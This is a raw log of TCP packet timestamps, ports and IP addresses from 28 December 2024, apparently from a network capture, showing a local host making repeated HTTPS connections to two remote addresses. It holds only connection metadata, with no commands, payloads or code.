                    Dec 28, 2024 11:35:59.906555891 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.929747105 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.929817915 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.929831028 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.929881096 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.046293974 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.046372890 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.046389103 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.046437979 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.060839891 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.060909986 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.060921907 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.060973883 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.077441931 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.077518940 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.077531099 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.077572107 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.091912031 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.091983080 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.092015982 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.092068911 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.104186058 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.104254007 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.104288101 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.104299068 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.104368925 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.120419025 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.120515108 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.120527983 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.120583057 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.133425951 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.133497953 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.133510113 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.133562088 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.146328926 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.146399975 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.146429062 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.146481037 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.247379065 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.247468948 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.247482061 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.247534037 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.258446932 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.258522034 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.258533001 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.258582115 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.272972107 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.273088932 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.273099899 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.273163080 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.284060955 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.284135103 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.284152985 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.284204006 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.290998936 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.291069984 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.291081905 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.291134119 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.297288895 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.297359943 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.297372103 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.297430992 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.302434921 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.302504063 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.302515030 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.302582979 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.307202101 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.307271004 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.307281971 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.307348967 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.313518047 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.313585043 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.313596010 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.313760996 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.319191933 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.319272041 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.319283009 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.319345951 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.324238062 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.324353933 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.324364901 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.324407101 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.330310106 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.330399990 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.330410957 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.330463886 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.443531036 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.443614960 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.443629026 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.443682909 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.448544979 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.448633909 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.448647022 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.448719978 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.453212976 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.453279018 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.453290939 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.453346014 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.459682941 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.459763050 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.459774971 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.459841967 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.464639902 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.464716911 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.464729071 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.464787006 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.471159935 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.471231937 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.471244097 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.471295118 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.475805044 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.475897074 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.475908041 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.475961924 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.480880976 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.480973959 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.480984926 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.481044054 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.486500978 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.486587048 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.486603975 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.486664057 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.489492893 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.489563942 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.489576101 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.489625931 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.490044117 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.490122080 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.490128994 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:36:00.490190983 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:36:00.907694101 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:00.907737970 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:00.907810926 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:00.908118010 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:00.908133984 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.220514059 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.220632076 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.358609915 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.358674049 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.359076023 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.359339952 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.359504938 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.407331944 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.752151012 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.752218008 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.752243996 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.752310991 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.753284931 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.753326893 CET44349732104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.753355026 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.753400087 CET49732443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.881724119 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.881774902 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:02.881866932 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.882159948 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:02.882175922 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.141447067 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.141522884 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.142297029 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.142306089 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.143553019 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.143558025 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.890795946 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.890872955 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.890997887 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.890997887 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.915294886 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.915321112 CET44349733104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:04.915332079 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:04.915370941 CET49733443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:05.184357882 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:05.184453011 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:05.184533119 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:05.185300112 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:05.185334921 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.442688942 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.442904949 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.443861008 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.443871975 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.444966078 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.444971085 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.939238071 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.939291954 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.939296007 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.939344883 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.939440012 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.939457893 CET44349734104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:06.939491987 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:06.939501047 CET49734443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:07.053581953 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:07.053622007 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:07.053771019 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:07.054078102 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:07.054092884 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.312180042 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.312362909 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.313079119 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.313088894 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.314364910 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.314369917 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.814752102 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.814821005 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.814923048 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.814923048 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.814980984 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.814992905 CET44349735104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.815013885 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.815041065 CET49735443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.928915024 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.928956032 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:08.929064989 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.929425955 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:08.929445028 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:10.187323093 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:10.187371969 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:10.187947989 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:10.187956095 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:10.189522982 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:10.189527035 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:11.043273926 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:11.043353081 CET44349736104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:11.043359995 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.043529987 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.043529987 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.043554068 CET49736443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.164032936 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.164123058 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:11.164203882 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.164480925 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:11.164514065 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.423526049 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.423602104 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.424536943 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.424565077 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.425668955 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.425697088 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.918211937 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.918277979 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.918302059 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.918361902 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.918406963 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.918446064 CET44349737104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:12.918469906 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:12.918498039 CET49737443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:13.039618969 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:13.039659023 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:13.039722919 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:13.039938927 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:13.039952993 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.254173994 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.254255056 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.254817963 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.254826069 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.256356001 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.256361961 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.744491100 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.744565010 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.744579077 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.744632006 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.744649887 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.744703054 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.745438099 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.745438099 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.745450020 CET44349738104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.745570898 CET49738443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.897847891 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.897887945 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:14.897993088 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.898233891 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:14.898260117 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.199608088 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.199711084 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.200504065 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.200531006 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.201812983 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.201827049 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.718483925 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.718518972 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.718554974 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.718590975 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.718667030 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.718705893 CET44349740104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.718732119 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.718873978 CET49740443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.850529909 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.850583076 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:16.850684881 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.851018906 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:16.851046085 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.067058086 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.067159891 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.067620039 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.067640066 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.068943024 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.068955898 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.557605982 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.557651997 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.557682991 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.557725906 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.564358950 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.564397097 CET44349742104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.564438105 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.564457893 CET49742443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.694087029 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.694130898 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:18.694297075 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.694598913 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:18.694612980 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:19.907336950 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:19.907397985 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:19.907847881 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:19.907860041 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:19.915905952 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:19.915911913 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.393992901 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.394083023 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.394104958 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.394144058 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.394154072 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.394188881 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.394263983 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.394279003 CET44349745104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.394299030 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.394320011 CET49745443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.522274971 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.522298098 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:20.522388935 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.522742987 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:20.522756100 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:21.739360094 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:21.740255117 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:21.740684986 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:21.740704060 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:21.742005110 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:21.742010117 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:22.239178896 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:22.239341974 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:22.239480019 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.239480019 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.239533901 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.239554882 CET44349747104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:22.239563942 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.240232944 CET49747443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.352211952 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.352258921 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:22.356256008 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.356586933 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:22.356604099 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:23.618904114 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:23.619086981 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:23.619479895 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:23.619491100 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:23.627190113 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:23.627194881 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:24.068610907 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:24.068696976 CET49748443192.168.2.4104.21.34.5
                    Dec 28, 2024 11:36:24.068713903 CET44349748104.21.34.5192.168.2.4
                    Dec 28, 2024 11:36:24.068758011 CET49748443192.168.2.4104.21.34.5
